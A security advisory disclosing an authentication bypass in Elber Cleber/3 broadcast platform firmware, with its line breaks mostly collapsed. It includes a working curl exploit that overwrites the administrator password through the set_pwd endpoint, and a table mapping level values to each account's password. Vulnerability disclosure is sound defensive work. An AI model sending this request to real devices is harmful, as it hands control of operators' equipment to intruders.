Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication BypassVendor: Elber S.r.l.Product web page: https://www.elber.itAffected version: 1.0.0 Revision 7304                  1.0.0 Revision 7284                  1.0.0 Revision 6505                  1.0.0 Revision 6332                  1.0.0 Revision 6258                  XS2DAB v1.50 rev 6267Summary: Cleber offers a powerful, flexible and modular hardware andsoftware platform for broadcasting and contribution networks wherecustomers can install up to six boards with no limitations in termsof position or number. Based on a Linux embedded OS, it detects thepresence of the boards and shows the related control interface to theuser, either through web GUI and Touchscreen TFT display. Power supplycan be single (AC and/or DC) or dual (hot swappable for redundancy);customer may chose between two ranges for DC sources, that is 22-65or 10-36 Vdc for site or DSNG applications.Desc: The device suffers from an authentication bypass vulnerability througha direct and unauthorized access to the password management functionality. Theissue allows attackers to bypass authentication by manipulating the set_pwdendpoint that enables them to overwrite the password of any user within thesystem. This grants unauthorized and administrative access to protected areasof the application compromising the device's system security.--------------------------------------------------------------------------/modules/pwd.html------------------50: function apply_pwd(level, pwd)51: {52:   $.get("json_data/set_pwd", {lev:level, pass:pwd},53:   function(data){54:     //$.alert({title:'Operation',text:data});55:     show_message(data);56:   }).fail(function(error){57:     show_message('Error ' + error.status, 'error');58:   });59: }--------------------------------------------------------------------------Tested on: NBFM Controller           embOS/IPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5816Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php18.08.2023--$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234Ref (lev param):Level 7 = SNMP Write Community (snmp_write_pwd)Level 6 = SNMP Read Community (snmp_read_pwd)Level 5 = Custom Password? hidden. (custom_pwd)Level 4 = Display Password (display_pwd)?Level 2 = Administrator Password (admin_pwd)Level 1 = Super User Password (puser_pwd)Level 0 = User Password (user_pwd)